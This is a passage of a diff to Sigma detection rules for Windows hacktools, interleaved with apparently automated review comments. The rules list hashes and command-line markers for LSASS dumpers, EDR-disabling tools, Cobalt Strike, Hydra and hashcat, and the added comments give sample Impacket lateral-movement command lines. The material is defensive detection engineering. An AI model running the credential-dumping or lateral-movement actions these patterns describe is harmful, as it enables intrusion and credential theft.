14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi + - 3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi + - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi + - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi + - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi + - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi + - 5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi + - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe Akagi + - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi + - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi + - a53a02b997935fd8eedcb5f7abab9b9f # WCE + - e96a73c7bf33a464c510ede582318bf2 # WCE + - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers + - 09D278F9DE118EF09163C6140255C690 # Dumpert + - 03866661686829d806989e2fc5a72606 # Dumpert + - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - 19584675d94829987952432e018d5056 # SysmonQuiet + - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook + - 885c99ccfbe77d1cbfcb9c4e7c1a3313 # Forkatz + - 22a22bc9e4e0d2f189f1ea01748816ac # PPLKiller + - 7fa30e6bb7e8e8a69155636e50bf1b28 # PPLKiller + - 96df3a3731912449521f6f8d183279b1 # Backstab + - 7e6cf3ff4576581271ac8a313b2aab46 # Backstab + - 51791678f351c03a0eb4e2a7b05c6e17 # Backstab + - 25ce42b079282632708fc846129e98a5 # Forensia + - 021bcca20ba3381b11bdde26b4e62f20 # EDRSandBlast + - 59223b5f52d8799d38e0754855cbdf42 # EDRSandBlast + - 81e75d8f1d276c156653d3d8813e4a43 # EDRSandBlast + - 17244e8b6b8227e57fe709ccad421420 # EDRSandBlast + - 5b76da3acdedc8a5cdf23a798b5936b4 # EDRSandBlast + - cb2b65bb77d995cc1c0e5df1c860133c # EDRSandBlast + - 40445337761d80cf465136fafb1f63e6 # EDRSandBlast + - 8a790f401b29fa87bc1e56f7272b3aa6 # EDRSilencer + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam + - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam + - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam + - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato + - 
IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato + - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG + - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato + - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato + - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato + - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato + - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump + - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump + - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump + - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump + - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump + - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump + - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump + - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump + - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump + - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX + - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump + - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump + - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump + - IMPHASH=730073214094CD328547BF1F72289752 # Htran + - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons + - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons + - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons + - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons + - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump + - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump + - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump + - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump + - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump + - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump + - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump + - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump + - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump + - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump + - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump + 
- IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump + - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump + - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump + - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump + - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump + - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz + - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz + - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader + - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader + - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader + - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader + - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump + - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi + - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi + - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi + - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi + - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi + - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi + - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi + - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi + - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi + - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi + - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi + - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE + - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE + - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers + - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert + - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert + - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet + - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook + - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz + - 
IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller + - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller + - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab + - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab + - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab + - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia + - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast + - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast + - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast + - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast + - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast + - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast + - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast + - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer condition: process_creation and selection falsepositives: - Legitimate use of one of these tools diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml index fd5f92985..3561dc062 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml @@ -1,8 +1,7 @@ title: Hacktool Execution - PE Metadata id: 37c1333a-a0db-48be-b64b-7393b2386e3b status: test -description: Detects the execution of different Windows based hacktools via PE metadata - (company, product, etc.) even if the files have been renamed +description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed references: - https://github.com/cube0x0 - https://www.virustotal.com/gui/search/metadata%253ACube0x0/files 
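Review bot: The annotated `Imphash:` list mixes cases (`09D278F9DE118EF09163C6140255C690` and `84B763C45C0E4A3E7CA5548C710DB4EE` among lowercase entries) and the `Hashes|contains` list has three lowercase values (`IMPHASH=bf6223a49e45d99094406777eb6004ba`, `IMPHASH=03866661686829d806989e2fc5a72606`, `IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d`) among uppercase ones; Sigma string matching is case-insensitive by default, but if any backend compiles these to a case-sensitive comparison those entries silently miss, so normalising each list to one case is cheap insurance. The comment `# ShaprEvtMute Hook`, present on both lists, is presumably a typo for `# SharpEvtMute Hook`. The header comment would also read better as `# Sysmon Hashes field carries every configured hash type, IMPHASH included`.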
@@ -22,7 +21,7 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- Company: Cube0x0
+ Company: Cube0x0 # Detects the use of tools created by a well-known hacktool producer named "Cube0x0", which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec, etc.)
condition: process_creation and selection
falsepositives:
- Unlikely
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_gmer.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_gmer.yml
index a1ec75c64..dd8294244 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_gmer.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_gmer.yml
@@ -25,9 +25,9 @@ detection:
- SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57
- SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173
selection_other:
- - md5: e9dc058440d321aa17d0600b3ca0ab04
- - sha1: 539c228b6b332f5aa523e5ce358c16647d8bbe57
- - sha256: e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173
+ - md5: e9dc058440d321aa17d0600b3ca0ab04
+ - sha1: 539c228b6b332f5aa523e5ce358c16647d8bbe57
+ - sha256: e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173
condition: process_creation and (1 of selection_*)
falsepositives:
- Unlikely
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_handlekatz.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_handlekatz.yml
index b59ee9016..f3d4d141e 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_handlekatz.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_handlekatz.yml
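Review bot: The comment added to `Company: Cube0x0` is a single inline comment of well over two hundred characters on the matched value itself, which makes the one line the selection consists of hard to scan. The same text as a block comment directly above `selection:` would keep the match line short and read like the per-tool block comments the impacket lateral-movement rule in this patch uses. The content of the comment is fine: it explains why the company string alone is a usable indicator, which the rule's description does not.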
@@ -1,8 +1,7 @@
title: HackTool - HandleKatz LSASS Dumper Execution
id: ca621ba5-54ab-4035-9942-d378e6fcde3c
status: test
-description: Detects the use of HandleKatz, a tool that demonstrates the usage of
- cloned handles to Lsass in order to create an obfuscated memory dump of the same
+description: Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same
references:
- https://github.com/codewhitesec/HandleKatz
author: Florian Roth (Nextron Systems)
@@ -21,19 +20,19 @@ detection:
Channel: Microsoft-Windows-Sysmon/Operational
selection_loader_img:
Image|endswith: \loader.exe
- CommandLine|contains: '--pid:'
+ CommandLine|contains: '--pid:'
selection_loader_imphash:
- - Imphash:
- - 38d9e015591bbfd4929e0d0f47fa0055
- - 0e2216679ca6e1094d63322e3412d650
- - Hashes:
- - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055
- - IMPHASH=0E2216679CA6E1094D63322E3412D650
+ - Imphash:
+ - 38d9e015591bbfd4929e0d0f47fa0055
+ - 0e2216679ca6e1094d63322e3412d650
+ - Hashes:
+ - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055
+ - IMPHASH=0E2216679CA6E1094D63322E3412D650
selection_flags:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- '--pid:'
- '--outfile:'
- CommandLine|contains:
+ CommandLine|contains:
- .dmp
- lsass
- .obf
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_hashcat.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_hashcat.yml
index ef2331aae..9c5a1483e 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_hashcat.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_hashcat.yml
@@ -1,8 +1,7 @@
title: HackTool - Hashcat Password Cracker Execution
id: 39b31e81-5f5f-4898-9c0e-2160cfc0f9bf
status: test
-description: Execute Hashcat.exe with provided SAM file from registry of Windows and
- Password list to crack against
+description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat
- https://hashcat.net/wiki/doku.php?id=hashcat
@@ -23,7 +22,7 @@ detection:
selection_img:
Image|endswith: \hashcat.exe
selection_cli:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- '-a '
- '-m 1000 '
- '-r '
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml
index a68921606..b4e0ec887 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml
@@ -1,8 +1,7 @@
title: HackTool - Htran/NATBypass Execution
id: f5e3b62f-e577-4e59-931e-0a15b2b94e1e
status: test
-description: Detects executable names or flags used by Htran or Htran-like tools (e.g.
- NATBypass)
+description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
references:
- https://github.com/HiwinCN/HTran
- https://github.com/cw1997/NATBypass
@@ -26,7 +25,7 @@ detection:
- \htran.exe
- \lcx.exe
selection_cli:
- CommandLine|contains:
+ CommandLine|contains:
- '.exe -tran '
- '.exe -slave '
condition: process_creation and (1 of selection_*)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_hydra.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_hydra.yml
index 6ff87780b..645d04d0a 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_hydra.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_hydra.yml
@@ -1,8 +1,7 @@
title: HackTool - Hydra Password Bruteforce Execution
id: aaafa146-074c-11eb-adc1-0242ac120002
status: test
-description: Detects command line parameters used by Hydra password guessing hack
- tool
+description: Detects command line parameters used by Hydra password guessing hack tool
references:
- https://github.com/vanhauser-thc/thc-hydra
author: Vasiliy Burov
@@ -21,10 +20,10 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- '-u '
- '-p '
- CommandLine|contains:
+ CommandLine|contains:
- ^USER^
- ^PASS^
condition: process_creation and selection
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml
index cb8d98675..e2e22a380 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml
@@ -1,8 +1,8 @@
title: HackTool - Potential Impacket Lateral Movement Activity
id: 10c14723-61c7-4c75-92ca-9af245723ad2
related:
- - id: e31f89f7-36fb-4697-8ab6-48823708353b
- type: obsoletes
+ - id: e31f89f7-36fb-4697-8ab6-48823708353b
+ type: obsoletes
status: stable
description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework
references:
@@ -28,12 +28,29 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_other:
+ # *** wmiexec.py
+ # parent is wmiprvse.exe
+ # examples:
+ # cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1
+ # cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1
+ # *** dcomexec.py -object MMC20
+ # parent is mmc.exe
+ # example:
+ # "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567442499.05 2>&1
+ # *** dcomexec.py -object ShellBrowserWindow
+ # runs %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe
+ # example:
+ # "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1567520103.71 2>&1
+ # *** smbexec.py
+ # parent is services.exe
+ # example:
+ # C:\Windows\system32\cmd.exe /Q /c echo tasklist ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat
ParentImage|endswith:
- - \wmiprvse.exe
- - \mmc.exe
- - \explorer.exe
- - \services.exe
- CommandLine|contains|all:
+ - \wmiprvse.exe # wmiexec
+ - \mmc.exe # dcomexec MMC
+ - \explorer.exe # dcomexec ShellBrowserWindow
+ - \services.exe # smbexec
+ CommandLine|contains|all:
- cmd.exe
- /Q
- /c
@@ -41,9 +58,10 @@ detection:
- '&1'
selection_atexec:
ParentCommandLine|contains:
- - svchost.exe -k netsvcs
- - taskeng.exe
- CommandLine|contains|all:
+ - svchost.exe -k netsvcs # atexec on win10 (parent is "C:\Windows\system32\svchost.exe -k netsvcs")
+ - taskeng.exe # atexec on win7 (parent is "taskeng.exe {AFA79333-694C-4BEE-910E-E57D9A3518F6} S-1-5-18:NT AUTHORITY\System:Service:")
+ # cmd.exe /C tasklist /m > C:\Windows\Temp\bAJrYQtL.tmp 2>&1
+ CommandLine|contains|all:
- cmd.exe
- /C
- Windows\Temp\
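Review bot: In the second hunk (`@@ -41,9 +58,10 @@`) the added comment `# cmd.exe /C tasklist /m > C:\Windows\Temp\bAJrYQtL.tmp 2>&1` sits directly under the two `ParentCommandLine|contains:` items, where it reads as a third, disabled parent pattern, although it is a sample of the child command line that the following `CommandLine|contains|all:` matches. Move it to just above `CommandLine|contains|all:` and label it the way the first hunk labels its samples, e.g. `# example (child command line):` on the line before it, so the atexec case is documented in the same shape as the wmiexec/dcomexec/smbexec blocks. The per-tool blocks in the first hunk, and the inline tool names on the `ParentImage` entries, are otherwise consistent and a clear gain for anyone tuning the rule.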
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_tools.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_tools.yml
index 96b7a7028..8ef2a5f82 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_tools.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_tools.yml
@@ -1,8 +1,7 @@
title: HackTool - Impacket Tools Execution
id: 4627c6ae-6899-46e2-aa0c-6ebcb1becd19
status: test
-description: Detects the execution of different compiled Windows binaries of the impacket
- toolset (based on names or part of their names - could lead to false positives)
+description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)
references:
- https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries
author: Florian Roth (Nextron Systems)
@@ -20,43 +19,58 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - Image|contains:
- - \goldenPac
- - \karmaSMB
- - \kintercept
- - \ntlmrelayx
- - \rpcdump
- - \samrdump
- - \secretsdump
- - \smbexec
- - \smbrelayx
- - \wmiexec
- - \wmipersist
- - Image|endswith:
- - \atexec_windows.exe
- - \dcomexec_windows.exe
- - \dpapi_windows.exe
- - \findDelegation_windows.exe
- - \GetADUsers_windows.exe
- - \GetNPUsers_windows.exe
- - \getPac_windows.exe
- - \getST_windows.exe
- - \getTGT_windows.exe
- - \GetUserSPNs_windows.exe
- - \ifmap_windows.exe
- - \mimikatz_windows.exe
- - \netview_windows.exe
- - \nmapAnswerMachine_windows.exe
- - \opdump_windows.exe
- - \psexec_windows.exe
- - \rdp_check_windows.exe
- - \sambaPipe_windows.exe
- - \smbclient_windows.exe
- - \smbserver_windows.exe
- - \sniff_windows.exe
- - \sniffer_windows.exe
- - \split_windows.exe
- - \ticketer_windows.exe
+ - Image|contains:
+ - \goldenPac
+ - \karmaSMB
+ - \kintercept
+ - \ntlmrelayx
+ - \rpcdump
+ - \samrdump
+ - \secretsdump
+ - \smbexec
+ - \smbrelayx
+ - \wmiexec
+ - \wmipersist
+ - Image|endswith:
+ - \atexec_windows.exe
+ - \dcomexec_windows.exe
+ - \dpapi_windows.exe
+ - \findDelegation_windows.exe
+ - \GetADUsers_windows.exe
+ - \GetNPUsers_windows.exe
+ - \getPac_windows.exe
+ - \getST_windows.exe
+ - \getTGT_windows.exe
+ - \GetUserSPNs_windows.exe
+ - \ifmap_windows.exe
+ - \mimikatz_windows.exe
+ - \netview_windows.exe
+ - \nmapAnswerMachine_windows.exe
+ - \opdump_windows.exe
+ - \psexec_windows.exe
+ - \rdp_check_windows.exe
+ - \sambaPipe_windows.exe
+ - \smbclient_windows.exe
+ - \smbserver_windows.exe
+ - \sniff_windows.exe
+ - \sniffer_windows.exe
+ - \split_windows.exe
+ - \ticketer_windows.exe
+ # - '\addcomputer_windows.exe'
+ # - '\esentutl_windows.exe'
+ # - '\getArch_windows.exe'
+ # - '\lookupsid_windows.exe'
+ # - '\mqtt_check_windows.exe'
+ # - '\mssqlclient_windows.exe'
+ # - '\mssqlinstance_windows.exe'
+ # - '\ntfs-read_windows.exe'
+ # - '\ping_windows.exe'
+ # - '\ping6_windows.exe'
+ # - '\raiseChild_windows.exe'
+ # - '\reg_windows.exe'
+ # - '\registry-read_windows.exe'
+ # - '\services_windows.exe'
+ # - '\wmiquery_windows.exe'
condition: process_creation and selection
falsepositives:
- Legitimate use of the impacket tools
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_impersonate.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_impersonate.yml
index db21d6c71..d278849a5 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_impersonate.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_impersonate.yml
@@ -1,8 +1,7 @@
title: HackTool - Impersonate Execution
id: cf0c254b-22f1-4b2b-8221-e137b3c0af94
status: test
-description: Detects execution of the Impersonate tool. Which can be used to manipulate
- tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
+description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
references:
- https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/
- https://github.com/sensepost/impersonate
@@ -23,9 +22,9 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection_commandline_exe:
- CommandLine|contains: impersonate.exe
+ CommandLine|contains: impersonate.exe
selection_commandline_opt:
- CommandLine|contains:
+ CommandLine|contains:
- ' list '
- ' exec '
- ' adduser '
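Review bot: The fifteen commented-out `Image|endswith` entries added after `\ticketer_windows.exe` (from `# - '\addcomputer_windows.exe'` to `# - '\wmiquery_windows.exe'`) carry no statement of why they are kept out of the live list, so the next maintainer cannot tell whether they are deliberate false-positive exclusions or candidates waiting to be enabled. A single lead comment above them would settle that, for example `# Intentionally not matched: the names below are generic or collide with legitimate tooling (ping, reg, services, esentutl) - kept for reference`; if the actual reason is different, state that one instead. The rest of the hunk is re-indentation only.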
@@ -35,9 +34,9 @@ detection:
- SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A
- IMPHASH=0A358FFC1697B7A07D0E817AC740DF62
selection_hash_ext:
- - md5: 9520714AB576B0ED01D1513691377D01
- - sha256: E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A
- - Imphash: 0A358FFC1697B7A07D0E817AC740DF62
+ - md5: 9520714AB576B0ED01D1513691377D01
+ - sha256: E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A
+ - Imphash: 0A358FFC1697B7A07D0E817AC740DF62
condition: process_creation and (all of selection_commandline_* or 1 of selection_hash_*)
falsepositives:
- Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_inveigh.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_inveigh.yml
index 3163151f4..6bcabee5f 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_inveigh.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_inveigh.yml
@@ -1,8 +1,7 @@
title: HackTool - Inveigh Execution
id: b99a1518-1ad5-4f65-bc95-1ffff97a8fd0
status: test
-description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle
- tool
+description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
references:
- https://github.com/Kevin-Robertson/Inveigh
- https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
@@ -21,17 +20,17 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- - Image|endswith: \Inveigh.exe
- - OriginalFileName:
- - \Inveigh.exe
- - \Inveigh.dll
- - Description: Inveigh
- - CommandLine|contains:
- - ' -SpooferIP'
- - ' -ReplyToIPs '
- - ' -ReplyToDomains '
- - ' -ReplyToMACs '
- - ' -SnifferIP'
+ - Image|endswith: \Inveigh.exe
+ - OriginalFileName:
+ - \Inveigh.exe
+ - \Inveigh.dll
+ - Description: Inveigh
+ - CommandLine|contains:
+ - ' -SpooferIP'
+ - ' -ReplyToIPs '
+ - ' -ReplyToDomains '
+ - ' -ReplyToMACs '
+ - ' -SnifferIP'
condition: process_creation and selection
falsepositives:
- Very unlikely
diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml
index fa4622b1d..76aa2b1ad 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml
@@ -3,7 +3,7 @@ id: b222df08-0e07-11eb-adc1-0242ac120002
status: test
description: Detects Obfuscated use of Clip.exe to execute PowerShell
references:
- - https://github.com/SigmaHQ/sigma/issues/1009
+ - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26)
author: Jonathan Cheong, oscd.community
date: 2020/10/13
modified: 2022/11/17
@@ -21,12 +21,15 @@ detection:
EventID: 1
Channel: Microsoft-Windows-Sysmon/Operational
selection:
- CommandLine|contains|all:
+ # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"'
